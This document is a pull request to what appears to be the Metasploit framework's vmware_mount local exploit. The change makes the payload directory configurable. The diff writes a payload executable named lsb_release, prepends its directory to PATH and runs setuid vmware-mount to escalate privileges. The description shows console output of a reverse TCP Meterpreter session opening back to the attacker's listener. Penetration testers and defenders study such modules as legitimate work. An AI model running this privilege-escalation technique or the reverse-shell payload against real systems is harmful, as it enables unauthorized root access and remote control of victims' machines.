### PR TITLE
vmware-mount configurable directory

### DIFF
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -54,7 +54,7 @@ class Metasploit4 < Msf::Exploit::Local
       }
       ))
     register_options([
-        OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+        OptString.new("WRITABLEDIR", [ true, "A directory where you can write files.", "/tmp" ]),
       ], self.class)
   end
 
@@ -71,13 +71,14 @@ class Metasploit4 < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
     end
 
-    path = "#{datastore["WritableDir"]}"
-    write_file("#{path}/lsb_release", generate_payload_exe)
-    cmd_exec("chmod +x #{path}/lsb_release")
-    cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
+    lsb_path = File.join(datastore['WRITABLEDIR'], 'lsb_release')
+    write_file(lsb_path, generate_payload_exe)
+    cmd_exec("chmod +x #{lsb_path}")
+    cmd_exec("PATH=#{datastore['WRITABLEDIR']}:$PATH /usr/bin/vmware-mount")
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
-    cmd_exec("rm -f #{path}/lsb_release")
+    cmd_exec("rm -f #{lsb_path}")
+
   end
 
   def setuid?(remote_file)

--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -53,6 +53,9 @@ class Metasploit4 < Msf::Exploit::Local
         'DisclosureDate' => "Aug 22 2013"
       }
       ))
+    register_options([
+        OptString.new("WritableDir", [ true, "A directory where you can write files.", "/tmp" ]),
+      ], self.class)
   end
 
   def check
@@ -68,13 +71,13 @@ class Metasploit4 < Msf::Exploit::Local
       fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
     end
 
-    write_file("lsb_release", generate_payload_exe)
-
-    cmd_exec("chmod +x lsb_release")
-    cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
+    path = "#{datastore["WritableDir"]}"
+    write_file("#{path}/lsb_release", generate_payload_exe)
+    cmd_exec("chmod +x #{path}/lsb_release")
+    cmd_exec("PATH=#{path}:$PATH /usr/bin/vmware-mount")
     # Delete it here instead of using FileDropper because the original
     # session can clean it up
-    cmd_exec("rm -f lsb_release")
+    cmd_exec("rm -f #{path}/lsb_release")
   end
 
   def setuid?(remote_file)


### PR DESCRIPTION
This PR adjusts the `vmware_mount` exploit so that a writable folder can be specified (it defaults to `/tmp`). This fixes the case where the shell's current working folder isn't writable.

```
msf exploit(vmware_mount) > show options 
Module options (exploit/linux/local/vmware_mount):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   SESSION      1                yes       The session to run this module on.
   WRITABLEDIR  /tmp             yes       A directory where you can write files.

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         192.168.200.21   yes       The listen address
   LPORT         4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(vmware_mount) > exploit 

[*] Started reverse handler on 192.168.200.21:4444 
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 192.168.200.103
[*] Meterpreter session 3 opened (192.168.200.21:4444 -> 192.168.200.103:34455) at 2014-11-27 21:38:00 +0000
```
